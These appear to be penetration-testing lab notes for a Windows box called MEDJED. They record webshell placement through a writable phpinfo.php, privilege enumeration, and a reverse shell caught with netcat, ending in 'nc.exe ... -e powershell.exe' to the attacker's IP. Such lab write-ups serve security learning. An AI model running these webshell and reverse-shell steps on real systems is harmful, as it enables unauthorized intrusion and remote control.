6 :45332 :45443 QuizApp

# just another rails project
# but has phpinfo.php and can load it up

http://192.168.154.127:45443/phpinfo.php
System 	Windows NT MEDJED 10.0 build 18363 (Windows 10) AMD64
Architecture 	x64 
Loaded Configuration File 	C:\xampp\php\php.ini 
SCRIPT_FILENAME 	C:/xampp/htdocs/phpinfo.php 

# now we know where this file is and its loading properly
# as we have r/w perms via Barrcuda Web-File-Server
# modify phpinfo.php > webshell

http://192.168.154.127:45443/phpinfo.php
# received web shell
CMD: whoami && whoami /priv

whoami && whoami /priv
medjed\jerren

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

# time to get reverse shell
# uploading shell.php
# 6969 failed, using 445

http://192.168.154.127:45443/shell.php

$ rlwrap nc -lvnp 445                                                                                                                                                                                                                   1 ⨯
listening on [any] 445 ...
connect to [192.168.49.154] from (UNKNOWN) [192.168.154.127] 51247
SOCKET: Shell has connected! PID: 6136
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs> whoami
medjed\jerren

# got PS shell using 
CMD: nc.exe 192.168.49.154 45443 -e powershell.exe